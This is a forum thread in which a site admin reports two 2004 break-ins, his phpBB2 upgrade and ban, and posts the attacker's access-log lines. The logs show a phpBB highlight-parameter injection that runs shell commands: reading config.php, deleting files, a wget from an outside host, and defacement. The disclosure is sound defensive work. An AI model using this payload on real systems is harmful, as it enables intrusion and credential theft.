Board update to phpBB2 version 2.0.11

This forum is about this website itself: the content pages, the forums, and the wiki.
Post Reply
User avatar
Carsten
Site Admin
Posts:2170
Joined:2004-08-19, 13:46
Location:Germany
Contact:
Board update to phpBB2 version 2.0.11

Post by Carsten » 2004-12-19, 14:08

After two hacks during the past few days, I just updated this forum to phpBB2 version 2.0.11.

The previous version contained a vulnerability that could be exploited such that access to the Ca3DE website and forums was obtained. We suffered two such hacks during the past few days. Integrity of the website and forum is restored now, the integrity of the database was never violated.

Background information on the issue is available here:
http://www.phpbb.com/phpBB/viewforum.php?f=14

There are more security issues with PHP (not phpBB2!) that are mostly beyond my control, but I still hope that the measures taken will stop attacks like those of today and yesterday.

All log files are kept and securely stored for law enforcement.

At the opportunity, I also added a new set of smilies by Frederic Boogaertsl. These smilies are also used at the http://www.phpBB2.de website, and I think they are much nicer than the old ones. :)
Last edited by Carsten on 2005-01-02, 16:00, edited 2 times in total.
Best regards,
Carsten
User avatar
Carsten
Site Admin
Posts:2170
Joined:2004-08-19, 13:46
Location:Germany
Contact:

Post by Carsten » 2004-12-19, 19:08

I just finished some log file analysis: Using
cat access.log.51.5 access.log.51.7 | grep -i highlight | grep -i 212.238.220.203 | perl -wne 'use URI::Escape; print uri_unescape($_);'
at the Linux command line for filtering the relevant log files yielded:

212.238.220.203 - - [17/Dec/2004:22:27:58 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 15497 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:30 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 14927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:41 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13761 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:42 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13950 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:29:13 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; wget members.lycos.co.uk/icityiv/index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13417 http://www.ca3d-engine.de "-" "-" "-"

212.238.220.203 - - [19/Dec/2004:11:01:48 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153848 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157161 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:02:09 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164862 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154910 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155296 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ ; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219696 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:39 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../;ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219298 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219626 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218606 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:59 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218306 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:14 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218599 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:22 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155290 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:28 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 214064 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:41 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157344 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:12 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157162 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:16 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 166863 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:21 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 168479 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:37 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153798 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219226 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:55 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164029 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:07:36 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo haqed by LENIN666 > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153405 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:04 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color=red size=40>haqed by lenin_666</font> > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 152581 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color="red" size="40">haqed by lenin_666</font>" > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153566 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo '<font color="red" size="40">haqed by lenin_666</font>' > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153490 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154380 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:23 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155307 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:56 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153651 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:12:00 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155310 http://www.ca3d-engine.de "-" "-" "-"


I think this is clear enough. (This is the first time that I ever experienced such, apart from arranged tests. Quite an interesting and instructive matter, though.)

phpBB2 2.0.11 fixes the issue.
IP 212.238.220.203 is permanently banned.
Best regards,
Carsten
User avatar
Shadow
Posts:195
Joined:2004-08-28, 06:00
Location:Minesota, USofA
Contact:

Post by Shadow » 2004-12-20, 00:39

nice work man. just out of curiosity how did he get in?
Image
PBX CONTINUES!!!
CLICK HERE!!
User avatar
Carsten
Site Admin
Posts:2170
Joined:2004-08-19, 13:46
Location:Germany
Contact:

Post by Carsten » 2004-12-20, 11:00

I just fixed the smiley settings such that the "View More Emocticons" button below the set of standard smilies does actually display the entire set of smilies, not just a few. Here are some examples:

:guns: :idhitit:

:v: :hiding:

:groupwave1:
Best regards,
Carsten
User avatar
Carsten
Site Admin
Posts:2170
Joined:2004-08-19, 13:46
Location:Germany
Contact:

Post by Carsten » 2004-12-20, 11:12

Shadow wrote:nice work man. just out of curiosity how did he get in?
Well, it seems that the
highlight=%27.passthru($HTTP_GET_VARS[rush]).%27
statements in the lines above enabled anyone to execute shell commands on the webserver. I'm not that much of a hacker that I know all the related details, but they are publicly documented on some websites. The commands that were run in each such call are stated in the rush variables above, e.g. the deletion and replacement of index.php in the first attack.
As also the config.php was spied out, I also changed the database password yesterday. :P
Best regards,
Carsten
Post Reply

Who is online

Users browsing this forum: No registered users and 4 guests